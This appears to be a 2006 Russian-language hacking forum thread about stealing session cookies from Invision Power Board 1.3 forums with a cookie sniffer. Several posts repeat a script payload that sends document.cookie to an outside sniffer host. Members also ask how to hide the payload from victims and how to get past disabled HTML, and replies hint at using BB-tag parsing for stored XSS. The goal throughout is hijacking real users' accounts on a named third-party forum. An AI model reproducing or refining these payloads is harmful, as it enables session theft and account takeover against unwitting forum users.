Форумы Ipb 1.3 Final vs Сниффер

Discussion in 'Уязвимости CMS/форумов' started by BlackSpider, 28 Apr 2006.

  1. BlackSpider

    BlackSpider New Member

    Joined:
    28 Apr 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Почему-то не срабатывает сниффер http://www.antichat.ru/sniff/. Я его натравливал на форум http://www.ссылки запрещены.ru/forum/index.php где-то месяц назад - он показывал номера юзеров и их хэши. Сегодня я такое повторил - он ничего не выдает: пишет, что был запрос и все! Если кто знает - поясните пожалуйста в чем здесь проблема или хотя бы ссылку! Я искал по форуму, но не нашел ответа! Вот ссылка на сниффер http://www.antichat.ru/sniff/log.php. Администраторам: перенесите, пожалуйста, мое сообщение в соответствующий раздел!
     
    #1 BlackSpider, 28 Apr 2006
    Last edited by a moderator: 11 May 2006
  2. SiltStride

    SiltStride New Member

    Joined:
    9 May 2006
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -1
    Аналогично, форум Invision Power Board(U) v1.3.1 Final. Я посылаю примерное сообщение:

    Привет чувак <script>img = new Image(); img.src = "http://antichat.org/s/.gif
    "+document.cookie;</script>
    Я его посылаю себе для пробы, мне приходит эта ссылка! Какой в этом смысл? ничего не приходит мне на снифф! что я не так делаю? заранее благодарен.
    Может надо в код вставить? но там опять светится это сообщение.
     
    #2 SiltStride, 11 May 2006
    Last edited: 11 May 2006
    1 person likes this.
  3. Darth_antony

    Darth_antony Banned

    Joined:
    30 Mar 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    2BlackSpider я так понимаю что бага работает только под ие...
    2SiltStride возможно этото xss работает только в теле вообщения форума. что бы провритьь при создании ответа ткни "предварительный просмотр"
     
  4. SiltStride

    SiltStride New Member

    Joined:
    9 May 2006
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -1
    Получается, надо не в личку писать? а само сообщение правильное, не надо добавить что-нибудь, типа кода? например:
    Code:
    это сообщение надо писать в коде
    так не надо? просто писать?

    Кстати, куда в этом коде картинку вставлять? после каких слов?
    Вот он:
    <script>img = new Image(); img.src = "http://antichat.org/s/.gif
    "+document.cookie;</script>
    и еще,как сделать, чтобы пользователь не пропалил этот прикол, в ответе чтобы этого не было?
     
    #4 SiltStride, 11 May 2006
    Last edited: 11 May 2006
  5. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    --> и еще,как сделать, чтобы пользователь не пропалил этот прикол, в ответе чтобы этого не было?

    Учить javascript, юзать поиск по форуму и гугл http://www.google.ru/search?hl=ru&q=описание+cross+site+scripting&btnG=Поиск+в+Google&lr=lang_ru, читать статьи на античате http://antichat.ru/crackchat/HTML

    Ознакомиться с этой темой http://forum.antichat.ru/thread15678.html и со многими другими.
     
  6. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Че-то как-то все так отмодерировали, что я ничего не понял... какая проблемма?
    Вот это <scrip*t>img = ne*w Image(); im*g.src = "http://antichat.org/s/.gif
    "+document.c*ookie;</s*cript>
    сработает только, если включен хтмл.
     
  7. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    хз где вы это пытаетесь сделать, а на ruhelp'е не получается. Там авторизацию по сессиям ввели.
     
  8. SiltStride

    SiltStride New Member

    Joined:
    9 May 2006
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -1
    на http://www.ссылки запрещены.ru! помогите кто нитбудь! как ссылку сделать? пишу, а он доходит так, как я отправляю! А что значит Хтмл отключен?как его включить? Я все перепробовал, ничего не помогает! дайте пожалуйста по этому поводу совет.
     
    #8 SiltStride, 11 May 2006
    Last edited by a moderator: 11 May 2006
  9. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Раз ты такое пишешь, то совет тебе - прочитать все на античате или хотя бы важные темы (они написаны так Важно: и прикрепелены наверху раздела.
     
  10. SiltStride

    SiltStride New Member

    Joined:
    9 May 2006
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -1
    Так а с чего начать хотя бы?подскажите,пожалуйста, а то на сайте много статей и все вытекают одна из другой! с чего начать? заранее благодарен
     
  11. SiltStride

    SiltStride New Member

    Joined:
    9 May 2006
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -1
    Сейчас я кое-что прочитал и начал в этом деле немного смыслить. Спасибо и респект вам! но у меня возникла проблема, я не могу послать что-то типа

    <script>img = new Image(); img.src = "http://antichat.org/s/StrideHak.gif?"+document.cookie;</script>!!!

    И я, кажется, знаю почему, потому что Хтмл код отключен. что мне сделать, чтобы успешно обойти это препятствие?
     
  12. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Для этого читаешь дальше и потом поймешь, что такое активная Xss на форумах.
    Если в кратце, то это, когда у тебя ББ-тэги парсятя по очереди и превращаются в хтмл нужный тебе в итоге не странице форума. Если что-то не понял, то ищи по этим словам на форуме. ;)
     
    1 person likes this.
  13. SiltStride

    SiltStride New Member

    Joined:
    9 May 2006
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -1
    Не нашел! :confused: мне, пожалуйста, напиши их правильно, а то поиск в таком виде ничего не дает! :rolleyes:
     
  14. SiltStride

    SiltStride New Member

    Joined:
    9 May 2006
    Messages:
    20
    Likes Received:
    3
    Reputations:
    -1
    Нашел видео, посмотрел, сделал, как там было, а ничего не получилось!